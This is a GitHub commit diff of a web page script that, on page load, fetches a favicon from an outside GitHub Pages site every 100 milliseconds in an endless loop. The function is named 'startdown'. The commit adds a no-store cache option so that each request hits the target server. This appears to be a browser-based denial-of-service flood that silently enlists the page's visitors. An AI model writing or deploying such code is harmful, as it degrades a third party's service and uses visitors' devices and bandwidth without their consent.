This commit is contained in:
Boof 2023-01-17 10:46:16 +01:00 committed by GitHub
parent 3ec9bef521
commit 8173799d9d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -19,7 +19,7 @@
window.onload = async function startdown(){
while(true) {
await delay(100);
fetch('https://t0m0t0w.github.io/favicon.png')
fetch('https://t0m0t0w.github.io/favicon.png', {cache: "no-store"})
}
}
let speed = 1000